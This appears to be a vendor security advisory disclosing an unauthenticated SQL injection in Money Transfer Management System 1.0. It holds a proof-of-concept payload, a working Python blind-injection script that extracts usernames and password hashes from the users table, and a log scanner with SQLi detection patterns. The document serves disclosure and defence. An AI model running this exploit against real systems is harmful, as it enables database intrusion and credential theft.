Money Transfer Management System 1.0 - Unauthenticated SQLi
7.5
High
Discovered by
Offensive Team, Fluid Attacks
Summary
Full name
Money Transfer Management System - Unauthenticated SQL Injection
Code name
State
Public
Release date
Mar 15, 2022
Affected product
Money Transfer Management System
Affected version(s)
Version 1.0
Vulnerability name
SQL injection
Vulnerability type
Remotely exploitable
Yes
CVSS v3.1 vector string
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
CVSS v3.1 base score
7.5
Exploit available
Yes
CVE ID(s)
Description
Money Transfer Management System Version 1.0 allows an unauthenticated user to inject SQL queries in admin/maintenance/manage_branch.php and admin/maintenance/manage_fee.php via the id parameter.
Proof of Concept
Steps to reproduce
Go to
http://127.0.0.1/mtms/admin/maintenance/manage_branch.php and insert the following query inside the id parameter:
?id=1' and 1=1 -- -
The server response changes depending on whether the injected condition (the second part of the query) is true or false, so the flaw can be exploited as a boolean-based blind SQL injection: any subquery result can be recovered one character at a time by comparing lengths and substrings. To automate the process use the exploit below.
System Information
Version: Money Transfer Management System version 1.0.
Operating System: Linux.
Web Server: Apache
PHP Version: 7.4
Database and version: MySQL
Exploit
import requests
import urllib.parse

# Characters tried, in order, for every position of the extracted value.
dictionary = """0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ !"#$%&\'()*+,-./:;<=>?@[\\]^_`{|}~"""


def sqli_bool(base_url, query):
    # Boolean oracle: a true injected condition produces a longer response.
    # The 2700-byte threshold was measured against the test deployment and
    # must be recalibrated for a different instance.
    url = "?id=1' and %s -- -" % query
    #proxies = {'http':'http://127.0.0.1:8080','https':'https://127.0.0.1:8080'}
    #r = requests.get(base_url+url, proxies=proxies)
    r = requests.get(base_url + url)
    return len(r.text) > 2700


def get_length(url, query):
    # Find the length of the query result by testing length(...)=i for i in 0..199.
    for i in range(0, 200):
        current_query = "(length((%s))=%s)" % (query, str(i))
        current_query = urllib.parse.quote(current_query)
        if sqli_bool(url, current_query):
            return i
    return -1


def make_query(url, query):
    # Get length
    print("[*] Getting output length:")
    length = get_length(url, query)
    if length == -1:
        print("Error getting query length")
        return 0
    print("[+] Output Length: " + str(length))
    current_result = ""
    print()
    print("[*] Getting output: ")
    # MySQL substr() positions start at 1.
    # Note: '"' and '\\' are not escaped for MySQL, so those two characters
    # produce an invalid condition and are never matched.
    for pos in range(1, length + 1):
        for char in dictionary:
            current_query = '(substr((%s),%s,1)="%s")' % (query, str(pos), requests.utils.quote(char))
            if sqli_bool(url, current_query):
                current_result += char
                print(current_result, end='\r')
                break
    print("[+] Found: " + " " * 100)
    print(current_result)


url = "http://127.0.0.1/mtms/admin/maintenance/manage_branch.php"
# must be only 1 row
# use limit and offset to iterate
# CHANGE THIS
query = "select concat(username,':', password) as t1 from users limit 1"
make_query(url, query)
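As a defensive counterpart to the exploit above, the following Python scans Apache combined-format access log lines for boolean-based probes against the two endpoints named in this advisory. This is example code added for this page, not Fluid Attacks' or the vendor's code. The log lines are constructed for the example, and the log layout, the signature patterns and the path filter are assumptions made here.

```python
import re
from collections import Counter
from urllib.parse import urlsplit, parse_qs, unquote_plus

# Endpoints the advisory names as injectable via the "id" parameter.
AFFECTED_PATHS = (
    "/mtms/admin/maintenance/manage_branch.php",
    "/mtms/admin/maintenance/manage_fee.php",
)

# Signatures of boolean-based blind probing: the advisory's PoC uses
# "1' and 1=1 -- -", and its exploit uses length()/substr() comparisons
# over a subselect. Assumed patterns, tuned for this advisory.
SQLI_PATTERNS = [
    re.compile(r"'\s*(and|or)\b", re.I),
    re.compile(r"\b(length|substr|substring|ascii)\s*\(", re.I),
    re.compile(r"--\s*-?\s*$"),
    re.compile(r"\bselect\b.*\bfrom\b", re.I),
]

# Apache Combined Log Format (assumed layout for the example).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)'
)

# Constructed sample log lines (not real traffic). Lines 2-4 are probes;
# line 5 carries a payload but targets an unaffected path.
SAMPLE_LOG = [
    '198.51.100.7 - - [15/Mar/2022:10:00:01 +0000] "GET /mtms/admin/maintenance/manage_branch.php?id=1 HTTP/1.1" 200 2650',
    '198.51.100.7 - - [15/Mar/2022:10:00:02 +0000] "GET /mtms/admin/maintenance/manage_branch.php?id=1%27%20and%201%3D1%20--%20- HTTP/1.1" 200 2750',
    '198.51.100.7 - - [15/Mar/2022:10:00:03 +0000] "GET /mtms/admin/maintenance/manage_branch.php?id=1%27%20and%20%28length%28%28select%20concat%28username%2C%27%3A%27%2C%20password%29%20as%20t1%20from%20users%20limit%201%29%29%3D5%29%20--%20- HTTP/1.1" 200 2650',
    '203.0.113.9 - - [15/Mar/2022:10:00:04 +0000] "GET /mtms/admin/maintenance/manage_fee.php?id=2%27%20and%20%28substr%28%28select%20user%28%29%29%2C1%2C1%29%3D%22r%22%29%20--%20- HTTP/1.1" 200 2780',
    '203.0.113.9 - - [15/Mar/2022:10:00:05 +0000] "GET /mtms/index.php?id=1%27%20and%201%3D1%20--%20- HTTP/1.1" 200 1200',
]


def parse_line(line):
    """Parse one access log line into a dict with the decoded "id" parameter, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    parts = urlsplit(rec["target"])
    rec["path"] = parts.path
    qs = parse_qs(parts.query, keep_blank_values=True)
    # parse_qs already percent-decodes once; decode a second time so a
    # double-encoded payload (the exploit quotes the condition before the
    # HTTP library encodes the URL again) is still inspected in clear.
    rec["id"] = unquote_plus(qs.get("id", [""])[0])
    return rec


def is_sqli_probe(rec):
    """True when the request hits an affected endpoint with a probe-like id value."""
    if rec["path"] not in AFFECTED_PATHS:
        return False
    return any(p.search(rec["id"]) for p in SQLI_PATTERNS)


def scan(lines):
    """Return (flagged records, Counter of probes per source IP)."""
    hits = [rec for rec in map(parse_line, lines) if rec and is_sqli_probe(rec)]
    return hits, Counter(r["ip"] for r in hits)


if __name__ == "__main__":
    hits, per_ip = scan(SAMPLE_LOG)
    for rec in hits:
        print("%s %s id=%r size=%s" % (rec["ip"], rec["path"], rec["id"], rec["size"]))
    print("probes per source:", dict(per_ip))
```

The per-source count matters more than any single hit: extracting one value with the exploit above costs up to 200 requests for the length plus up to 95 per character, so a blind extraction appears as a burst of hundreds of requests whose response sizes alternate between two values. Drop the `AFFECTED_PATHS` filter to apply the same signatures to every endpoint.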
Mitigation
As of 2022-03-15 there is no patch resolving the issue.
References
Timeline
Feb 15, 2022
Vulnerability discovered
Feb 15, 2022
Vendor contacted
Mar 15, 2022
Public disclosure
Does your application use this vulnerable software?
During our free trial, our tools assess your application, identify vulnerabilities, and provide recommendations for their remediation.

Fluid Attacks' solutions enable organizations to identify, prioritize, and remediate vulnerabilities in their software throughout the SDLC. Supported by AI, automated tools, and pentesters, Fluid Attacks accelerates companies' risk exposure mitigation and strengthens their cybersecurity posture.
Targets
Subscribe to our newsletter
Stay updated on our upcoming events and latest blog posts, advisories and other engaging resources.
© 2026 Fluid Attacks. We hack your software.
Meet us at RSA Conference™ 2026 at booth N-4614! Book a demo on-site.